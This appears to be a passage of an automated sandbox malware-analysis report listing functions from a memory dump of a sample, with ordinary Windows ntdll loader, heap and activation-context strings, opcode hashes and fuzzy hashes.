Opcode Fuzzy Hash: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
Instruction Fuzzy Hash: 77912830A017159BEB69DF18D885BEE7BB5BF40B14F04017CEA90AB781DB799841CB91

Function 0107645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
apphelp.dll, xrefs: 01076496

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: bc0f8a5f6a5a2705aa404860e0543fce389e266fccfcada958f4cc3ab55a665e
Instruction ID: 23270b7a567e93ae0e984c4b7beaff2064026ab67ca7a64a1550692b627b8d19
Opcode Fuzzy Hash: bc0f8a5f6a5a2705aa404860e0543fce389e266fccfcada958f4cc3ab55a665e
Instruction Fuzzy Hash: FD51C0716187059FE724DF28C881AABB7E8FB84748F00092DF5D69B260D731E944DB97

Function 010B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 010F2165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 010F2180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010F21BF
RtlGetAssemblyStorageRoot, xrefs: 010F2160, 010F219A, 010F21BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 010F219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 010F2178

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 8dbc8eacefdbafde9533e858d3403eba493bb3d35263c450e4ffd9fc2e855960
Instruction ID: 1d20e0fcd63e00a5ed1b6682c14856d2f648c1ca5fb5e20027c48f66762603f2
Opcode Fuzzy Hash: 8dbc8eacefdbafde9533e858d3403eba493bb3d35263c450e4ffd9fc2e855960
Instruction Fuzzy Hash: 8831FB36F802157BE7218A998C86F9F7BB8FBA5A94F05005DBB847B140D370EE01C7A5

Function 010BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 010F8177, 010F81EB
LdrpInitializeProcess, xrefs: 010BC6C4
minkernel\ntdll\ldrredirect.c, xrefs: 010F8181, 010F81F5
minkernel\ntdll\ldrinit.c, xrefs: 010BC6C3
Loading import redirection DLL: '%wZ', xrefs: 010F8170
Unable to build import redirection Table, Status = 0x%x, xrefs: 010F81E5

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 2657b2f4a306bc05d352b4d8a64a954144699b4b0de62f726418865bf2608cc1
Instruction ID: a5ee5457e4637c61dc0809d0f2c79e0753dfec11a3ddc97209a491273c6c5cbe
Opcode Fuzzy Hash: 2657b2f4a306bc05d352b4d8a64a954144699b4b0de62f726418865bf2608cc1
Instruction Fuzzy Hash: B031E4717447069BD324EF68DD86E9A77E8BF94B10F04456CF9C5AB291E720EC04CBA2

Function 010C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 010C2DF0: LdrInitializeThunk.NTDLL ref: 010C2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D74

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 4ba7e4f3859c8427b081a782587845d5bc91a10e0ec90700ee17fdc07f59dc33
Instruction ID: 8bcdc3419e843ccd7991985c212645fb736dad04248e38bfc40368a80b6e7124
Opcode Fuzzy Hash: 4ba7e4f3859c8427b081a782587845d5bc91a10e0ec90700ee17fdc07f59dc33
Instruction Fuzzy Hash: C9426B75900705DFDB61CF68C881BAAB7F4BF04704F1485ADEA89EB645D770AA84CF60

Function 010929A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01093264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0109327D
HEAP[%wZ]: , xrefs: 01093255
, xrefs: 010931A3

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-3126994380
Opcode ID: b5ebc993654048b8329849779ec9c8c021ab499e372df7c9d1a6438f5533dc3b
Instruction ID: c3558662539bfd90d900e333a9deb6e868b3e177416a8371f007535a99096475
Opcode Fuzzy Hash: b5ebc993654048b8329849779ec9c8c021ab499e372df7c9d1a6438f5533dc3b
Instruction Fuzzy Hash: 9992BC71A042499FDF65CFA8C4607AEBBF1FF48304F1880A9E899AB391D735A941DF50

Function 0108A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0108A3EF
8, xrefs: 0108A3E7
LdrResFallbackLangList Exit, xrefs: 0108A3FF
6, xrefs: 0108A3F7

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
Instruction ID: 9c4ba23efa58783345d96fea5747c7d8285d7fd0b62eb01fe1b139ab15d6f5c0
Opcode Fuzzy Hash: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
Instruction Fuzzy Hash: 90C18B7460C386CFDB11EF59C044B6AB7E4BF88704F04496AF9D58BA51E738CA49CB62

Function 010B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 010B8591
LdrpInitializeProcess, xrefs: 010B8422
minkernel\ntdll\ldrinit.c, xrefs: 010B8421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62

Function 010B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 010B28D8
SXS: %s() passed the empty activation context, xrefs: 010F21DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010F22B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010F21D9, 010F22B1

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
Instruction ID: ccac4d5ab8554cabd6301f7aff8b44a1e6559c0934b3bd61e6ad89b28b591f00
Opcode Fuzzy Hash: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
Instruction Fuzzy Hash: FDA1BF3590022A9BDB65CF68C8C4BE9B7B0BF58354F1541EAD988AB251D730EE81CF94

Function 010B4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 010F3456
RtlDeactivateActivationContext, xrefs: 010F3425, 010F3432, 010F3451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 010F342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 010F3437

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: f197635f0372ade89fd34aba7dc4b7f81658da7d67219a8d32c0b710ad32c8a3
Instruction ID: 01b1311c52b1c1f9e8b5d093d5d637f6902a015afeb15df7e26eaad45930c38a
Opcode Fuzzy Hash: f197635f0372ade89fd34aba7dc4b7f81658da7d67219a8d32c0b710ad32c8a3
Instruction Fuzzy Hash: DC6106326047129BD762CF19C882B6AB7E5BF90B60F14855DEAD6DF681CB30F901CB91

Function 010864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
Instruction ID: c379ca71bd00ea4648c99ff449b635a176e1b912d1bc208ae837d59533b6eb90
Opcode Fuzzy Hash: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
Instruction Fuzzy Hash: 5971BFB19083059FCB61EF14C885B9B7FE8AF54764F400469F9C88B286D775D588CBE2

Function 010B4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

LdrpFindDllActivationContext, xrefs: 010F3636, 010F3662
minkernel\ntdll\ldrsnap.c, xrefs: 010F3640, 010F366C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010F362F
Querying the active activation context failed with status 0x%08lx, xrefs: 010F365C

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 82c889c5b8334e20fdda192acfee5071fd0042e837a62a5f0e17e516d711b81f
Instruction ID: 0381aa19004f954cfd9ef1307630b3c1c020f13f147867d62f50aec47ec1025d
Opcode Fuzzy Hash: 82c889c5b8334e20fdda192acfee5071fd0042e837a62a5f0e17e516d711b81f
Instruction Fuzzy Hash: F0314D31A006119ADF76BB0CC8C9BF576F4BB01654F0680A9E6D6DB253D7609E80C7C1

Function 010A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
LdrpDynamicShimModule, xrefs: 010EA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
apphelp.dll, xrefs: 010A2462

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80

Function 01090770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010E50BD
(UCRBlock->Size >= *Size), xrefs: 010E50CA
HEAP[%wZ]: , xrefs: 010E50AE

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
Instruction ID: 86943306984ce0330008b309e997c1bc06ae20c1553adac62872a34aa71da9de
Opcode Fuzzy Hash: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
Instruction Fuzzy Hash: B4F1CC34B00606DFEB15CF69C8A4B6EB7F9FB45308F1485A8E4969B385D734E981CB90

Function 010A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 010A6C24
, xrefs: 010ECA51

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
Instruction ID: 093db1db17a2489455e67e58c94e5db114d1dbc07e77cfdbc7e1060e09124c9e
Opcode Fuzzy Hash: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
Instruction Fuzzy Hash: EBC2AC716083419FEB65CF69C880BABBBE5BF88704F44896DE9C987241D736D805CB92

Function 0107A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 010DC1E4
UseFilter, xrefs: 0107A1C1
FilterFullPath, xrefs: 010DC2E6

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54

Function 010A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 010EA121
LdrpCheckModule, xrefs: 010EA117
Failed to allocated memory for shimmed module list, xrefs: 010EA10F

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 92917d899fa265aee025d4e75790662f9783ca0b0e8cd39ecc60b662058aed37
Instruction ID: 08db7d06cfdefebd83b46db0fb1eb70ca0d9edf422a1739bd91638d0a49abbe3
Opcode Fuzzy Hash: 92917d899fa265aee025d4e75790662f9783ca0b0e8cd39ecc60b662058aed37
Instruction Fuzzy Hash: E671D170A00209DFDB29DFA9C984AEEB7F4FB48704F54406DE992AB315E734AD81CB50

Function 01090A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010E5342
HEAP[%wZ]: , xrefs: 010E5335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 010E534D

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 0f4b811307c86a086b52f43a90840ce3321f80b81499e30cd00d815b22453dfd
Instruction ID: b0c7426805acf6ea6b68c0baa1414684289f6dd3e1bcc4aca58efa37b7623786
Opcode Fuzzy Hash: 0f4b811307c86a086b52f43a90840ce3321f80b81499e30cd00d815b22453dfd
Instruction Fuzzy Hash: D561DF30600301DFDB69CF28C854BAABBE5FF45708F14859AE4D98F28AD774E881CB90

Function 010BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 010F82E8
Failed to reallocate the system dirs string !, xrefs: 010F82D7
LdrpInitializePerUserWindowsDirectory, xrefs: 010F82DE

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 232c8dcad5b6f7711708e62a53ba7765a8f315e248b5b995bb66b6462d54a8fd
Instruction ID: 7e2c0a8fa6af52a91cec71a4a37f92eeb378a3a2a6a226f82bf13429b0e57f0d
Opcode Fuzzy Hash: 232c8dcad5b6f7711708e62a53ba7765a8f315e248b5b995bb66b6462d54a8fd
Instruction Fuzzy Hash: AC4102B1544305ABE725EB68D984B9B77F8FF44620F00853AB9D4D7260E770E840CB91

Function 0113C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
@, xrefs: 0113C1F1
PreferredUILanguages, xrefs: 0113C212

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
Instruction ID: 7ed3cff642500e619548674884fa71a64e6513ad317ceadd8e0c3c71d58677c0
Opcode Fuzzy Hash: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
Instruction Fuzzy Hash: CE416372E00219EBDF15DBD8C851FEEBBB9AB94700F14406BEA49F7244D7749A448B90

Function 01114144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01114225
LdrpResValidateFilePath Enter, xrefs: 01114160
LdrpResValidateFilePath Exit, xrefs: 01114172

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
Instruction ID: 2311db793bfb4142fe3cb5bb7f6940a0ad1542722bcd070725b8b640904ac47a
Opcode Fuzzy Hash: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
Instruction Fuzzy Hash: 9D4126319002588BEB29DBE8D850BEDFBB4FF55B40F240469D941EFB85D7349941CB51

Function 01104755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01104899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01104888
LdrpCheckRedirection, xrefs: 0110488F

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 1aeafb9705f1fe500ddad34e41707be17513f813cb9f594f26019274b6fde8f7
Instruction ID: 5a52e15b4a822f0c851c6580f096f4fe4c07f05a4352f335ab0eb125d902d17c
Opcode Fuzzy Hash: 1aeafb9705f1fe500ddad34e41707be17513f813cb9f594f26019274b6fde8f7
Instruction Fuzzy Hash: 5A41E732E04A519FDB2BDE9CD480A277BE4AF89650F06056EEF94D7B91D7B0D900CB81

Function 01090BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010E543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 010E5449
HEAP[%wZ]: , xrefs: 010E5431

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 56267823491266d20b5f77b8502f29cbabc95615d1991a4a999130ed99454fae
Instruction ID: 580d0cd6fc5397740e9054e2df90196bb934fbd1d7adb282bb317bad14b4f780
Opcode Fuzzy Hash: 56267823491266d20b5f77b8502f29cbabc95615d1991a4a999130ed99454fae
Instruction Fuzzy Hash: B011E1713141429FDBA9DA1ACC68BBAB3E8EF40A1DF188569F486CB295DF30D840C754

Function 011020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 011020F3
minkernel\ntdll\ldrinit.c, xrefs: 01102104
LdrpInitializationFailure, xrefs: 011020FA

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
Instruction ID: 08756b3918a5597afdabc437cc503ef25d3d892972a185f0d81ff81a5bf24c9c
Opcode Fuzzy Hash: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
Instruction Fuzzy Hash: A8F0C235A40308AFE729E64CCC46F9A777DFB80B54F54006DFA90BB6C5D2F0A940CA91

Function 010903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010E4D8A

Strings

#%u, xrefs: 010E4D82

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
Instruction ID: 9afe3e0313d30227efcf1a6d89d14c72217b6644e03342c6ed4cb346093a38a0
Opcode Fuzzy Hash: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
Instruction Fuzzy Hash: E57159B1A0014A9FDF05DFA9C994BAEB7F8BF08744F144069E945EB251EB34ED41CBA0

Function 0108A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0108AA25
LdrResSearchResource Enter, xrefs: 0108AA13

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: d4d39c9c965ebdff5d24e0f544aee9b5cf076e351eef98511da9d3bfb2ad8b14
Instruction ID: c4541547bce1f1c44f8a5aada873e08f9ec77caa6bb7f0bb47a517475d063a52
